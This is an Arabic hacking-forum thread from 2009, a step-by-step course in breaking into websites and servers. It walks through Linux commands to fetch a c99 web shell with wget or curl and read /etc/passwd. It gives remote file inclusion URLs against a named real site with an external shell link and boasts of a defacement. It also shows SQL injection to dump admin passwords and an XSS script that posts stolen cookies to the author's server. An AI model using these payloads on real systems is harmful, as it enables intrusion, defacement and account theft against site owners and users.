دورة مبسطة في اختراق المواقع والسيرفرات

AZOZ · 01-27-2009, 12:44 AM

بسم الله الرحمن الرحيــم

السلام عليكم ورحمة الله وبركاته

قبل أن نبدأ فقطـ !! عليـكـ أن تقرأ هذه العبـآره

أقسـم بالله العظيـم أن لأ ألحـق الضـرر بأخوآنـي المسلـميـن بمآ أتعلمـه من هذه الدروس

طبعا هي دروس مجمعه منا ومنا وأن شا الله الكل بياخذ فكره عن هذا المجال

أول شي راح تنزل الدروس هنا ورا بعض فا لا اريد أن أحد يرد علي الين أخر درس

عاد فضل ليس أمر علشان تكون حلوه ورا بعض أوكـ

يالله بتوفيق

نريد تفاعل

المصدر: :: vBspiders Professional Network ::

],vm lfs'm td hojvhr hgl,hru ,hgsdvtvhj

AZOZ · 01-27-2009, 12:46 AM

#############################
مأذآ يجب علـي أن أعرف عن إخترآق الموآقـع والسيرفرآت ؟
#############################
سؤآل يطـرح نفسـه ..
يآطويل العـمـر .. أذآ تبي تخترق موقـع لأبد من وجود ثغره في الموقـع ..
وهو أهـم شـي .. لأخترآق الموقـع .. أو وجود ثغره بأي موقـع على نفس السيرفر المستضيف للموقع المرآد أخترآقه ..
والمقصود من الثغرأت هي الثغرات الخطيرة التي تمكنك من رفـع شـل ..
تمكنك من رفـع شـل<< هذي العبآره .. أكيد فيه منـكم .. وقف عند النقطه ذي قآل وشهو الشـل وش يرجع خخخخخخخخخ
الشـيل " shell " :
الشيل هو سكريبت مبرمج بلغة PHP يحتوي على أكوآد خبيثه يسمح لنا بتطبيق اوامر على السيرفر وطبعن رفع الشـل عن طريق الثغرآت
ويوجـد أنوآع كثيـره من الشـلآت منهآ :
c99
r57
Sniper_sa
ويختلف الشـل عن الأخر .. بالمميزآت فقطـ!! لكـن الغرض وآحـد ..
والآوآمر المقصوده بهآ .. هي أوآمـر اللينكـس
وسوف أتطرق بهالموضوع في درس لحآلـه .. لأهمية معرفه هذه الاوامر لأخترآق الموقع
مآهو اللينكـس .؟
هو نظآم تشغيل مثل الوندوز وأغلب اصحآب السيرفرات مركبينـه لآنه هو الأفضل ..
ولكـي تخترق يجب عليـك رفع شـل على السيرفر .. وألمآم بآوآمر اللينكـس
كذآ الحين الحمدللـه عرفت وش لك وش عليك في الأخترآق .. لآتخآفون بفصل كل شي قلته لكـم بإذن اللـه ..
#################################################

AZOZ · 01-27-2009, 12:47 AM

#############################
أوامر اللينكس
#############################
اوامر اللينكس هي اللغة التي تستطيع التواصل بها مع الجهاز اللي مركب عليه اللينكس
وكما نعرف ان اغلب سيرفرات المواقع يكون عليها اللينكس لدلك يجب ان نعرف هده الاوامر حتى نعرف نتعامل معها في عمليات الاختراق

اهم الاوامر اللي نستخدمها كتيرا في عمليات الاختراق
id : لمعرفة الصلاحيات على السيرفر

pwd : عرض المسار الكامل للمجلد الحالي

ls -la : عرض جميع الملفات والمعلومات

cd : امر الدخول إلى مجلد معين
cat : قرائه ملف
مثآل : اذا اردت قرائه ملف اسمه alkaser.php يكون كذا الامر cat alkaser.php
mkdir : انشاء مجلد جديد
مثآل : اذا اردت انشاء مجلد بأسم hack15 يكون الامر بهذا الشكل mkdir hack15
chmod XXX : تغيير تصريح مجلد او ملف
مثآل : اذا اردت تغيير تصريح مجلد بأسم net يكون الأمر بهذآ الشكـل chmodXXX net مع تغيير XXX إلى الرقم التصريح المطلوب
touch : أنشاء ملف
مثآل : اذا اردت أنشاء ملف بأسم wolf.php يكون الأمر بهذآ الشكل touch wolf.php طبعاً الملف راح يكون فارغ وخالي من الاكواد ممكن انت تكتب فيه عن طريق تحرير الملفات في الشل
mv : نقل الملفات او تغيير تسميتها
مثآل : اذا اردت نقل ملف alkaser.php الى مكآن أخر يكون الامر بهذآ الشكل mv alkaser.php /home/???/public_html/wolf
مثآل : اذا اردت تغيير أسم ملف من a.php إلى b.php يكون الأمر بهذآ الشكل mv a.php b.php ويشـترـط ان يكون هذآ المجلـد يحمل تصريح 777 (drwxrwxrwx)
cp : نسخ الملفات
مثآل : اذا اردت نسخ ملف بأسم alkaser.php إلى مكآن آخر يكون الأمر بهذآ الشكـل cp alkaser.php /home/???/public_html/up
ونستبـــدل home/???/public_html/up إلى مسار المجلد الي يتنسخ فيه الملف ويشترط ان يكون هذآ المجلد يحمل تصريح 777 (drwxrwxrwx)
rm : حذف ملف
مثآل : اذا اردت حذف ملف aaa.php سيكون الأمر بهذآ الشكل rm aaa.phprm -r : حذف مجلد
مثآل : اذا اردت حذف مجلد aaa سيكون الأمر بهذآ الشكل rm -r aaa
* : يضاف الى الأوامر المذكوره سابقاً وهي ترمز ألى "الكل"

مثآل : اذا كنت بداخل مجلد يحتوي على ملفات كثيرة وانت تريد تغيير صلاحيات جميع هذه الملفات الى تصريح معين من المتعب ان تقوم بتغييرها ملف ملف .. فهذا الأمر يختصر المسأله بحيث تقوم مثلا بتطبيق هذا الام chmod 777*في هذي الحاله بتلاحظ ان جميع محتويات هذا المجلد وجدت تصاريحها الى التصريح المطلوب

find : البحث عن ماتريده
مثآل : اذا اردت ان تبحث عن ملف بأسم a.php سيكون الامر بهذا الشكل find a.php
مثآل آخر : اذا اردت ان تبحث عن امتداد معين مثل .php يكون الأمر بهذا الشكل find*.php
مثآل آخر : اذا اردت ان تبحث عن أسم معين مثل b سواء كان نوعه ملف او مجلد يكون الامر بهذا الشكل find b *
لو اردت انشاء ملف ثم عرف محتويات المجلد للتأكد بأنه قام بأنشاء الملف يكون الامر بهذا الشكل touch file.php;ls -ls
أوامر رفع الملفآت
لرفع أي ملف تريد ويفضل ان يكون مضغوط .. طبعاً يكون الملف على رابط وليس من جهازك ويوجد اكثر من امر لرفع الملفات وراح اطرح اكثر من امر لكي لا يصعب عليك رفع ملف في أي حال لان بعض أوامر الرفع لا تستجيب على بعض السيرفرات
قبل ماتنفذ أمر الرفع تقوم بتطبيق "أمر التأكد" هل يمكنك رفع ملف بواسطة هذا الامر أو لا
wget
مثآل :wget http://www.???.com/c99.zip
curl
مثآل : curl -o http://www.???.com/c99.zip
GET
مثآل :GET http://www.???.com/c99.zip
lynx
مثآل : lunx -source http://www.???.com/c99.zip
أمر التأكد من عمل اوامر الرفع : whichXXXXواستبدل XXX بأمر الرفـع مثلن wget
اذا كان الناتج بهذآ الشكـل usr/bin/xxx معناته يمكنك أستخدام هذا الأمر في الرفع
XXX تتغير إلى امر الرفع الذي طبقته
unzip: فك ضغط الملفات والمجلدات المضغوطة بواسطة برنامج winzip
مثآل : اذا اردت ان تقوم بفك ضغط ملف بأسم wolf.zip يكون الأمر بهذا الشكل unzip wolf.zip
ويوجد أوآمر أخرى يمكنك البحث عنها والاستفاده
للمعلومية : جميع الأوامر المستخدمه السابقة تستطيع تسميتها بالأوامر الداخليه لأنها تنفذ في نفس المسار الي انت بداخله
وسأطرح بعض الأوآمر الخآرجـيه
واغلب الاوامر الخارجيه تكون لأهداف معينة تفيدنا بجمع المعلومات
cat/etc/passwd : اظهار جميع يوزرات المواقع
ls/var/named : اظهار المواقع
ls -la/etc/valiases : اظهار جميع المواقع + يوزراتها

:: Command execute ::
هذا المكان لتطبيق الاوامر

في اليسار مساحة لكتابة الاوامر

في اليمين بعض الاوامر الجاهزة
وايضاً على شـل الـ sniper

إلى الدرس القادم

AZOZ · 01-27-2009, 12:48 AM

#############################
التصاريـــح
#############################
مآهي التصاريح "Permissions" ?
هي اخد خصائص الملفات والمجلدات التي يضعها مالك الموقع او السيرفر على ملفاته لحمايتها
انوآع التصاريح :
تصريح يمكنك من فعل ماتريد [ قرائه - تعديل - حذف - إعاده تسميه - نسخ - نقل ]
تصريح يمكن مشاهدته فقط بدون فعل اي شي في المجلد او الملف
تصريح يمنعك من مشاهدة محتوى الملف وحتى فعل اي شي
مآهو شكل التصريح ؟
هو رقم من ثلاث خانات ويوجد لكل تصريح رمز معين لا يتغير
مثآل :
هذا احد التصاريح : 777
رمزه على المجلدات : drwxrwxrwx
رمزه على الملفات : rwxrwxrwx-
كيف أعرف تصريح ملف أو مجلـد ؟
مثلن شفت هذآ التصريح drwxrwxrwx
d << طبعـن هذا يرمز أن هذآ مجلـد
rwx << الي باللون الاصفـر تصريح مالك الملف ..
rwx << الي بالأخضر تصريح مجموعة مالك الملف ..
rwx << الي بالاحمر << الي باللون الاحمر تصريحك أنت ..
وطبعن انتم طالعو على الاحمر اخر شي .. وشوفو تصريحكم
والحروف تعنـي ..
r = قرائه
w = كتابه
x = تنفيذ
مثلن لقيتو على مجلد هذا التصريح
drwxrwxr-x يعنـي يمكنـكم القرائه فقط!!
اتمنى فهمتو قصدي
drwxrwxrwx << نفصل الرمز هذا وليه يقولون عنه تصريح 777 لأن لمآ تغير تصريح ملفاً مآ لايطلب منك كتابه الحروف ..؟
في الاصل الحروف r w x تعني :
r = 4
w = 2
x = 1
طيب لو شفنا هذا التصريح rwxrwxr-x على ملف وش بيكون الرقم ؟
rwx = 4+2+1
r-x = 4+1
r-x = 4+1
مثل ماتشوفون التصريح طلع رقم 755 وبهذي الطريقه تعرف الارقام
اتمنى فهمتو قصدي .!!

AZOZ · 01-27-2009, 12:48 AM

#############################
الصلاحيات
#############################
مثل ما عرفنا ان السيرفرات تستخدم نظام اللينكس وهو نظام مثل الويندوز

ولكنه أقوى وأفضل منه في الحماية .. وفي اشياء كثيرة ...
ونظام اللينكس له ثلاث صلاحيات :
root : [أسمه ثابت لا يتغير]
هذه الصلاحيه تتحكم بالسيرفر كامل تحذف تنسخ تلصق تحذف الي في راسه يسويه باللغه العاميه ساطي ..
user : [ أسمه غير ثابت يتغير ]
هذه الصلاحية تتحكم في جزء معين لايمكنها التحكم في غيرها ولاحتى تستعرضه .. مثل اليوز في الوندوز لا يمكنه التعديل على مستندات يوزر ثاني فقط المستندات الذي يملكها فقط !!
nobody : [ اسمه ثابت لايتغير]
هذه الصلاحيه من خلالها تقدر تستعرض الملفات وتتمشى في المواقع لا يمكن التعديل ولا الحذف ولا شي بس استعراض
ووووو يمكنك التعديل والحذف والنسخ والصق في الملفات المصرحه بـ777 (drwxrwxrwx)
(apache)
هذي شبيهة بالصلاحية (nobody) حيث تسمح لك بالتنقل بين جميع المواقع على السيرفر كذلك
/
id : امر معرفة صلاحيتك على السيرفر
أو مكتوب في الجزء العلوي من الشل بعد كلمة id
/
كيف شكل صلاحيه user ؟
وصلاحية اليوزر .. يطلعلنا مكتوب اسم مستخدم الموقع ..
مثلن نفذنآ هالأمر id
وطلع صلاحيتنا بانها
uid=1000 (D3iS) gid=1000(D3iS) groups=1000(D3iS) i
/home/D3iS/public_html
D3iS : أسم المستخدم الموقع الذي نحن عليه بصلاحية يوزر

AZOZ · 01-27-2009, 12:49 AM

#############################
شـرح الشـيل '' Shell ''
#############################
.. أحلىىىىى بـآك لآحلى منـتـدى ..
/
كمآ قلنآ في الدروس السآبقه بأن الشـل هو :
سكريبت مبرمج بلغة PHP يحتوي على أكوآد خبيثه يسمح لنا بتطبيق اوامر على السيرفر وطبعن رفع الشـل عن طريق الثغرآت
حلوو الحيـن نشرح وآجـهـه الشـل والي بشـرح عليـه شـل c99 لآنـه الافضـل للمبتدئـين وسهولة التعآمل معه
|
الجزء الأعلى من الشل :

5.1.6 << إصدار برنامج قآرئ ملفآت الـ php وهو الي تنزل فيه الثغرآت مثـل copy و ini_restore الي نتخطى فيه الحمآيه وايضا ثغرات اخرى يكتشفونها
هدي هي اسم نوع الملقم و الملقم هو البرنامج اللي يعتمد عليه السيرفر و يخول لنا قراءة الملفات اللي عليه عن طريق المواقع و هو اما Apache او ISS
iss تعتمده سيرفرات الويندوز فقط

هدي تشير الى بعض المعلومات الهامة للسيرفر
النظام المركب على السيرفر : Linux
2.6.9-55.ELsmp << في حالة اللينكس هدي تسمى الكيرنل

صلاحيتنآ على السيرفر .. وانا صلاحيتي الي هي pikopati يوزر

هذه تشير إلى الوضع الامني في السيرفر يأ أمآ تكون on أو OFF
في حالة on تكون مجموعة من الاوامر معطلة و الكتير من العراقيل تصدنا لكن فيه طرق لتخطيه راح نتطرق لها كدلك في دورتنا هده ان شاء الله

مسآرنأ على السيرفر

هذه بعض الخيارات المتاحه لنا في الشل ورآح نتعرف على اهمها في الدروس القادمه بإذن الله
/
الان الجزء الي في الوسط يستعرض مجلدات و ملفات الموقع الي رافعين عليه الشيل وصلاحية كل ملف ومجلد

بجانب الملفات نجد بعض الايقونات ببساطه هي تختصر لنا تطبيق الاوامر فواحدة للتعديل و اخرى للتحميل و اخرى لنتقاء المعلومات عن الملف ...
فـآ بس أنت اول ماتنآظر بتفهـم .. كانك تتصفح في جهازك ..
/

:: Command execute ::
هذا المكان لتطبيق الاوامر

في اليسار مساحة لكتابة الاوامر

في اليمين بعض الاوامر الجاهزة
/

/

AZOZ · 01-27-2009, 12:51 AM

#############################
الثغـرآت واسغلالهـآ والبحث عنهـآ ..
#############################

################################################## ###
ما هي الثغرات ؟؟
الثغره هي عباره عن خطأ برمجي يمكننا استغلاله في أن نجعل النظام يقوم بتنفيذ أوامرنا التي نعطيها إليه
مثلاً فيه سكريبت مبرمج بالـ php عنده أمر لإدراج بيانات أسماء الأعضاء
الحين أنا أمسك هالملف واطالع فيه فحصته لقيته عادي ينفذ الأمر اللي هو قراءة بيانات الأعضاء
لاحظت فيه خطأ برمجي أقدر من خلاله بدل ما أخلي السكريبت يسوي ادراج لبيانات الأعضاء
خليته يسوي إدراج لملف شيل ^_^ وهذي ثغره نسميها File Include
ومن الشيل عاد انتم تعرفون خطورته ووش نقدر نسوي فيه .. الخ
وهكذا ..
أتمنى فهمتم الزبده اتركوا الكلام الفآضي وخذوا الزبده *_^
################################################## ###
ما هي انواع الثغرات ؟؟
الثغراات كثيييييييره لاتعد ولا تحصى في أنواع كثيره من الأنظمه
حنا في هالكتاب راح نتطرق لثلاث أنواع أساسية في نظام الـ php
وهي
1-File Include(ادراج ملف)
2- Sql Injection (تنفيذ أوامر في قاعدة البيانات)
3-XSS(تستخدم لسرقة الكوكيز سواء للمنتدى أو لسكريبت أو لأي برنامج)
=-=
النوع الأول
هو أخطر أنواع الثغرات ويسري عبر أخطاء برمجية مما يجعل الهكر
يقوم بإدراج ملف شيل خطير يمكنه من التلاعب بالموقع واختراقه وأعتقد الكل يعرف وش هو
وان شاء الله قريب بنزل كتاب عن الروت يعني من خلال هالشيل تقدر تسطير على السيرفر كآمل
بكل مواقعه
-
النوع الثاني
وهذا أقل خطورة من الفايل انكلود ويقوم عبر أخطاء برمجية بإرسال أوامر إلى قاعدة البيانات
مثلاً أمر لقراءة معلومات عضوية الأدمن رقم واحد أو أمر لتغيير كلمة مروره وتقدر تستغلها بأشياء كثير
كمثال
ثغرة sqlمن خلالها نفذنا أمر يقوم بتغيير ايميل عضوية المدير العام للسكريبت المصاب بالثغره
فقمنا بتغيير ايميله مثلاً الى ايميلي vv9@hotmail.comثم اروح للسكريبت واسوي نسيت كلمة المرور
وراح يرسلها لايميلي لووول وبكذا نخترق عضوية المدير العام وندخل لوحة التحكم للسكريبت
وأحلى اندكس اختراق ننزله وبعض السكريبت نقدر نرفع شيل من لوحة التحكم وهكذا ..
-
النوع الثالث
يعتبر أقل خطورة من الأول والثاني وأكيد الكل سمع في هالنوع من الثغرات وحربها
وأقرب مثال ثغرات الـ xssفي موقع الهوتميل
وهذي الثغرات من خلالها نقدر نسحب كوكيز أي عضو بالموقع مثل الهوتميل لكن تعتبر أقل خطورة
في استغلالها لأنها ممكن تدخلنا مثلاً بعضوية المدير العام كمثال في المنتدى
بس هنا خطورتها ضعيفه لأننا لو دخلنا ما نعرف الباس ولو نبي نعرف الباس وش نسوي ؟
لازم نغير الايميل لو دخلنا وغيرنا الايميل ما يتغير لاحظت انه يقول لي دخل الباس القديم وانا معرفه
لأني داخل عن طريق الكوكيز هنا ما نقدر نستغلها في شي *_^
وكذلك الهوتميل دخلنا وقلنا نبي نغير كلمة المرور بالكوكيز يقول ما تقدر تغيرها لازم تعرف القديمه
فكرنا وعرفنا حركه وهي اننا نروح للهوتميل ونقول له نسينا كلمة المرور ويرسل الرابط للانبوكس
وراح نفتحه ونغير كلمة المرور وهكذا ..
وتختلف خطورة هالنوع من الثغرات من سكريبت إلى آخر
################################################## ###
كيفية البحث عن الثغرات ؟؟
موضوع حلو صح ^_^ ايه أكيد حلو لأني أول واحد أحتاجه قبلكم والحمد لله ارتحت منه باقي انتم ترتاحون
رآح نشرح كيف نبحث عن الثغرات في المواقع التالية :-
www.securityfocus.com
www.securityreason.com
www.milw0rm.com
www.google.com
=-=
نمسكها وااحد وااحد ويالله بسم الله
ادخلوا هنا
www.securityfocus.com
بعد ما تدخلوا الموقع
شوفوا الصوره :-

بعدها تلاحظ طلع لنا جدول بآخر الثغرات مرتبة تحت بعض
وبهالشكل :-

وبكذا والحمد لله عرفنا كيف نطلع آخر الثغرات شرح الاستغلال موب الحين في الدرس التالي
لكن خلونا نكمل هالدرس
لو مثلاً نبي نبحث عن ثغرات سكريبت معين بالموقع
شووف في نفس الموقع هذا
طآلع فوق تلقى مربع اكتب فيه اسم السكريبت

تمام الحين لاحظوا طلع لنا كل ثغرات سكريبت الـ Vb شوفوا الصورة :-

الحمد لله كذا انتهينا من طريقة البحث عن الثغرات الحين بمجرد الضغط عليها
راح يطلع لك استغلالها وكل شي واكمال شرحها بالدرس التالي بإذن الله
=-=
طيب لو ما لقينا اللي نبيه في الموقع اللي دخلناه فوق
نجرب في هالموقع
www.securityreason.com
اذا تبي تشووف آخر الثغرات المكتشفة
شووف الصورة :-

ثم راح تطلع لنا آخر الثغرات ومجرد الضغط على اسمها سيتم عرض كل معلوماتها مع استغلالها

طيب لو نبي نبحث عن ثغرات سكريبت معين الطريقة كالتالي :-

ثم

ثم نضغط ور Ok وسيتم البحث وإحضار كل المعلومات بإذن الله
=-=
طيب لو جربنا الموقعين اللي فوق وما عجبنا ولا واحد فيهم ولا لقينا اللي نبيه
نجرب هالموقع
www.milw0rm.com

هذا آخر الثغرات تطلع في الصفحة الرئيسية للموقع
واذا تبي تبحث عن ثغرات سكريبت معين شوف الصورة :-

ثم راح تطلع لك النتائج بالشكل التالي :-

وبكذا والحمد لله شرحنا على موقع ميل ورم
=-=
ولو بعد هذا ما لقينا اللي نبيه في المواقع اللي فوق
نسخدم حبيبنا القوقل لووووول ^_^
www.google.com
ادخل واكتب اسم السكريبت وشووف أخباره وثغراته وكل شي عنه

وبإذن الله بيطلع لك كل شي عن السكريبت
واقراا وخذ لك كوووفي ومخمخ على رااحتك وأقل من راحتك لأن أهم شي في الهكر
وبالأخص مكتشفي الثغرات يكونون على راحة تاامة وصبورين وان شاء الله يوصلون لهدفهم
=-=
وذي هذا الدرس نكون عرفنا بإذن الله كيف ندور على آخر الثغرات وثغرات سكريبتات معينه
الدرس التالي راح يكون لكيفية استغلال هذه الثغرات بإذن الله

################################################## ###
كيفية استغلال الثغرات ؟؟
هذا موضوع مهم ودقيق شوي
راح نشرح استغلال 3 أنواع قووية ومهمة من الثغرات شرحناها في درس سابق وهي :-
وهي
1-File Include(ادراج ملف)
2- Sql Injection (تنفيذ أوامر في قاعدة البيانات)
3-XSS(تستخدم لسرقة الكوكيز سواء للمنتدى أو لسكريبت أو لأي برنامج)
أعتقد اني شرحتها في درس أنواع الثغرات وفصلتها بالتفصيل الممل والحمد لله
=-=
وراح نشرح كل ثغره مع طريقة استغلالها بإذن الله
ونبدأ أول شي
شوفوا هالثغره لقيتها بمواقع السكيورتي :-

شوف طآل عمرك الثغره هذي وترجمتها
اسم السكريبت المصاب + اصدار السكريبت المصاب : WebMatic 2.6
نوع الثغره : File Include
هذا أهم شي في السطر كله وبس
اضغط عليها لرؤيتها وهذا رابط الثغره شوفها :-
http://securityreason.com/exploit*****/1911
شوف طآل عمرك راح أفصل الصفحه لك ان شاء الله شووف

ثم انزل تحت شووي وبتشووف التالي :-

يقول لك طآل عمرك ان فيه خطئين في السكريبت
يعني في السكريبت ثغرتين و Error معناها خطأ
شوف وش يقول لك
Error1 : require($P_INDEX."lib_album.php");
هذا الخطأ البرمجي الأول في السكريبت وسبب لنا ثغرة الفايل انكلود الأولى
وهذا الخطأ الثاني
Error2 : require($P_INDEX."page_album.inc");
وهذي ثغرة ثانية بعد في السكريبت عبارة عن خطأ برمجي أدى الى تكوين ثغرة فايل انكلود ثانية
يعني السكريبت الحين فيه ثغرتين فايل انكلود يا بلاش *_^
وشووف هالأسطر :-
[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]
هذي استغلال الثغرتين طآل عمرك
[target] = هنا نكتب رابط الموقع اللي عليه السكريبت
[path] = هنا نكتب اسم المجلد اللي عليه السكريبت مثل المنتدى ( vb )
اللي باللون الزيتي هذا امتداد الثغره وطريقة استغلالها
[Shell] = هنا اكتب رابط شيل انت رافعه على أي موقع ثاني بامتداد (txt)
وهذا الاستغلال كامل الحين روح دور أي موقع بقوقل مركب اصدار WebMatic 2.6
وطبق عليه هالثغره وادعسه
وهذا مثال على موقع مصاب :-
http://www.castillosprayers.com/web/core/index/index_album.php?P_INDEX=http://lecopra.xoompages.com/safe.txt?
اللي باللون الأحمر هذا رابط شيل ch99 انا رافعه على موقع ثاني ولاتنسى علامة الاستفهام
لازم تكتبها ضروري في آخر الشيل بعد كلمة txt
الحين وش راح يصير بعد ما شغلنا هالاستغلال
ثغرة الـ File Include تعني ادراج ملف
اللي راح يصير الحين ان السكريبت راح يسوي ادراج لملف الشيل من الرابط اللي حطيناه في الاستغلال
لداخل الموقع اللي عليه السكريبت وبكذا حنا معنا شيل على الموقع عاد
الحين انت سو العجب والعجااب
انا رفعت اندكس عالموقع لأن صلاحيتي كانت user
وهذا التسجيل بالزون اتش
http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=53992 61
وبكذا الحمد لله انتهينا من شرح استغلال ثغرة الـ File Include
ملاحظه كان الاستغلال على موقع نصراني اللي فوق *_^
=-=
ننتقل الحين لشرح ثغرة Sql Injection
راح أشرح على ثغرة sql انجكشن في سكريبت سجل الزوار وفيه أكثر من ثغره
راح نشرحها بجميع أنواعها
قبل ما أبدأ لازم يكون عندك نسخة من السكريبت اللي تبي تسوي عليه الثغره
أو عندك الكود أو الخطأ البرمجي اللي فيه الثغره
شوفوا هالثغره :-
http://xxx/gb/show.php?do=show&table=hhh
الخطأ البرمجي :-
$result=mysql_query("SELECT * FROM ".$table." order by id DESC") or die(mysql_error());

تلاحظون المتغير $table هذا داخل الاستعلام وطبعاً تعرفون انتم
ان أي كود برمجي يحتوي $table ومدعم بهالسطر :-
$table=$_GET['table'];
يعني الزائر يقدر يستبدل قيمة table بأي كلمة أو أي شي
وهذي ثغره في هالمكان
شوفوا الاستغلال :-
http://xxx/gb/show.php?do=show&table=hhh
يعني حنا الحين نقدر نختار قيمة لـ table وانا كتبت hhh
راح يطلع لنا خطأ يقول لنا الجدول hhh غير موجود في قاعدة البيانات يعني الثغره شغاله 100%
كل اللي علينا نستدعي جدول admin كذا :-
http://localhost/gb/show.php?do=show&table=admin
وسوي تشغيل تلاحظ انه أظهر لنا اسم المستخدم وكلمة مرور المدير العام
من قاعدة البيانات أو بالأصح أظهر لنا محتوى قالب الـ admin
ونقدر نستغله
بأي استغلال على راحتك أي قالب تبيه استعديه مثلا
http://localhost/gb/show.php?do=show&table=mail
اذا أنا ابي ايميلات الأعضاء وهكذا ..
هذي بداية بسيطه في هالنوع من الثغرات يبي لها خبره وواحد مبرمج php
لا تتعامل معها بشكل كبير اذا مالك خبره فيها
اذا تعلمت الفايل انكلود اللي فوق والـ xss وأتقنتهم
وحبيت تتعلم الـ sql حآول تبحث عن كتب وتقرا كثير عنها
والله الموفق ان شاء الله
=-=
طيب الحين عرفنا الفايل انكلود وعرفنا مقدمه بسطه عن ثغرات sql انجكشن
الحين نشرح ثغرات xss
ونااخذ لنا ثغرة xss بالاهداءات في المنتديات
والتطبيق على :-
http://www.3rbgirl.com/vb/index.php
ادخل وسجل بالمنتدى طآل عمرك
أنا سجلت
والحمد لله
=-=
على فكرة الثغره لازم نطبقها بشريط الاهداءات
ابي اكتب اهداءات عشان انزل الثغره يقول لازم 10 مشاركات
برب بشارك وأرجع ..
=-=
المهم شاركت 10 مشاركات لووووووول
>> كنه جاب شي جديد
خلاص لا تهآيطيون ترى المشاركات انجااز بس انتم ما عندكم ذووق أساسا *_^
المهم خلونا في موضوعنا
شاركنا عشر مشاركات يا سلام الحين نرووح نسوي اضافة اهدااء

ثم اكتب دولتك اكتب السعودية أي خرآآط اكتب الشبكه العنكبوتيه
محتوى الاهداء اكتب :
قبل ما نسوي محتوى الاهداء وقف هنا طآل عمرك اترك كل الشاشات مفتوحة
شوف مجلد الشرح هذا تلقى مجلد مرفق معه اسمه log
ادخل المجلد راح تلقى هالملفين

هالملفين راح تستخدمهم في كل ثغرات الـ xss واللي جرب ثغرة الهوتميل يفهم وش أقصد
المهم طآل عمرك لازم يكون عندك موقع أو مساحه مجانية على أي استضافة مجانية
أو حتى مدفووعة
وانا على سبيل المثال عندي
www.hack15.com
لازم ترفع الملفات على موقعك وأنا أفضل استخدام برنامج الـ FTP الشرح هنا
طآل عمرك
ارفع مجلد log على مساحتك
وانا على مساحتي على راح يكون تطبيقي كذا
www.hack15.com/log/
حلو تمام الحين شووف الملفين
cooc2.php >> هالملف ارفعه داخل مجلد log في موقعك بدون أي تعديل
اما ملف cooc1.js
حرره ببرنامج المفكره
[IMG]file:///C:/********s%20and%20Settings/mohd/سطح%20المكتب/دورة%20بسيطه%20لاختراق%20المواقع%20والسيرفرات/دروس%20الدورة/images/ss/7.gif[/IMG]

شبآب ما تحسون إني داج بالشرح ههههههههه ^_^
خلونا نكمل المهم بعد ما سوينا موافق راح يحرر الملف لنا بالمفكره
اذا كان جهازك عربي اضغط على الكيبورد Ctrl+Shift اللي في أيسر الكيبورد عشان نقلب المفكرة
على الجهة اليسرى عشان نكتب بدون أخطاء وأسهل ^_^
شووف الصورة :-

تمام الحين استبدلwww.xxx.comبرابط مسااحتك
انا راح استبدلها برابط مساحتي الناتج كذا
www.hack15.com

ثم سوي حفظ
ثم ارفع ملف coc1.js
الى ملف log بالموقع
تمام الحين أعطي ملف log التصريح 777
حلو تمام الحين انتهينا من هالخطوه والحمد لله
=-=
الحين نقدر نسوي أي ثغرة xss بسهوله
نستخدم استغلال الثغره ونستبدل رابط سرقة الكوكيز برابطنا
مثلاً
هذي ثغرة الكوكيز
تكتب في محتوى اهداءك هالكود :-

<Script>location.href="http://www.hack15.com/log/cooc2.php"+********.coockie</Script>

استبدل اللي باللون الأصفر برابط موقعك او مساحتك واعتمد الكود في الاهداءات
وروح ناام لووول
الحين أي واحد يشوف الاهداءات من الأعضاء أو بالأصح يطب المنتدى ^_^ راح ينسرق كوكيزه
بتقول لي يا حسين وين بيروح الكوكيز ؟
بقول لك طآل عمرك ادخل مجلد log في موقعك تلقى ملف xss.htm
داخله تلقى كل الكوكيزات القط كوكيز المدير العام وأحلى اختراق
وفيه ثغرات تكون في عنوان الموقع
مثل الهوتميل
استغلالها يختلف بشوي لكن أهم شي الملفات تكون عندك
يعني مجرد تعرف الثغره بس تضيف رابط اللوق تبعك واخترق لووووول
كيف تستغل الكوكيز طبعاً يختلف من ثغره لأخرى الهوتميل معروفه ومشروحه ببيت الهكرز
بالنسبة لكوكيزات المنتديات استغلالها هنا :-
http://www.v99x.com/vb/showthread.php?t=783
الشرح لحبيبي صقر غاامد وأحب أقول له ألف ألف مبرووك عالزواج يا قلبي الله يوفقك *_^
والحمد لله كذا استغلينا ثلاث أنواع الثغرات أخطر ثغرات الـ php
والحين أقدر أقول لك انت هكر
================

AZOZ · 01-27-2009, 12:55 AM

#############################
استثمار التغرات المكتوبة بلغات برمجية ..
#############################
-------------------------------------------------------------------------------------------------------------
في درس الثغرات خذنا استغلال ثغرات عاديه يعني ناخذ الاستغلال والدورك ونطبق . بعض الاحيان نلقى ثغرات يكون استغلالها بلغات برمجيه والاغلب تكون بهاللغات
PHP , Perl , PythOn , Sh,HtmL وإن شاء الله سوف نشرح كل استثمار لكل ثغره بإذن الله
-------------------------------------------------------------------------------------------------------------
استثمار الثغرات المكتوبة بالـ html
الذي تبداً بـ <html>
سوف يكون التطبيق على هده الثغرة
http://www.milw0rm.com/exploits/3818
و هي موجودة في سكريبتthe merchant 2.2.0
ننسخ الاستغلال بالكامل
ونضعه في المفكرة
وعدل كود الشيل الى الشيل حقنا

ونحفظه بامتداد الهتمل
زي كذا
exploit.html
يطلعنلنا شكله
زي كذا

بعدين نحـطه في الـ c
ونتسعـرضه من المتصفـح
C:\exploit.html

وأغلب الثغرآت المكتوبه بهذه اللغـه تكون نوعهآ remote file include
والحين بعلمـكـم طريقـه .. عشآن تطلـع استغلآل لهذه الثغـرهـ
مثلـن الحيـن لقيت موقـع مصـآب .. واستعرضت الشـل ..
ركز مـعـي
نحرر الصفحـه .. بالنوت بأد ..

الاستغلال بيكون كذآ
www.example.com/help/index.php?show=http://www.r3d-crew.com/hook.txt?
/
استثمار الثغرات المكتوبة بالـ Perl
التـي تبدأ
#!/usr/bin/perl
يلـزمـك هذـآ البرنآـمـج مترجم ثغرات البيرل
ActivePerl-5.8.7
حمله من الرابط هذا
http://www.hack-mix.com/tools/ActivePerl-5.8.7.815.rar
بنشرح الثغره على هذآ السكربت EQdkp 1.3.2 وهي من نوع Sql Injection
رابط التغرة
http://www.milw0rm.com/exploits/4030
ننسخ الثغره في مفكره ونحفظهآ بأمتدأد pl
exploit.pl

ونضعه في القـرص سـي C
بعدين نتفـح الدوس
أبدأ > تشغيل > cmd
او من هنآ
C:\WINDOWS\system32\cmd.exe
بعدين نروح لمكآن الثغره في الـ c
cd ..
cd ..
